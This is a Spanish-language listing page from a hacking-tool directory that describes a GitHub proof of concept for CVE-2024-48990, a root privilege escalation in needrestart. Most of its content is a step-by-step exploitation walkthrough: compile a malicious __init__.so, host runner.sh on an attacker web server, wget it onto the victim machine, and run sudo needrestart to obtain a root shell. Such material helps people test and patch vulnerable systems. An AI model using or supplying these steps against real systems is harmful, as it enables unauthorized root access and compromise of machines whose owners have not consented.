Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-48990 — PoC sobre CVE-2024-48990. Qualys descubrió que needrestart, antes de la versión 3.8, permite a atacantes locales ejecutar código arbitrario como root engañando a needrestart para que ejecute el intérprete de Python con una variable de entorno PYTHONPATH controlada por el atacante. (NIST) | Kitploit
Herramientas/GitHubGitHub/grecosamuel/cve-2024-48990
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y Educación
GitHubgrecosamuel/cve-2024-48990

CVE-2024-48990

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

PoC sobre CVE-2024-48990. Qualys descubrió que needrestart, antes de la versión 3.8, permite a atacantes locales ejecutar código arbitrario como root engañando a needrestart para que ejecute el intérprete de Python con una variable de entorno PYTHONPATH controlada por el atacante. (NIST)

Compartir
1hace 8 mesesAún no revisado

CVE-2024-48990

[!WARNING] Estos archivos e información están destinados únicamente con fines educativos. El autor no es responsable de ningún comportamiento malicioso. Toda la información proporcionada no tiene la intención de incitar ningún tipo de crimen o abuso.

Descripción

Qualys descubrió que needrestart, antes de la versión 3.8, permite a atacantes locales ejecutar código arbitrario como root engañando a needrestart para que ejecute el intérprete de Python con una variable de entorno PYTHONPATH controlada por el atacante. Consulte NIST para obtener detalles oficiales.

PoC

  1. Descargue el repositorio desde git

git clone https://github.com/grecosamuel/CVE-2024-48990.git

  1. Compile la librería exploit.c para generar una librería ELF válida y nómbrela __init__.so

gcc -shared -fPIC -o __init__.so exploit.c

  1. Cambie <IP> y <PORT> en runner.sh, línea 7 y línea 10, por su IP y PUERTO de su propio servidor web.
  2. Inicie el servidor web

python3 -m http.server

  1. Descargue runner en la máquina de la víctima

wget http://IP:PORT/runner.sh

  1. Establezca permiso de ejecución a runner

chmod +x runner.sh

  1. Ejecute el script

./runner.sh

  1. Ejecute needrestart con permiso sudo

sudo needrestart

Cuando aparezca [*] CVE module created presione CTRL+C para detener el proceso y obtener su shell !

Descargar herramienta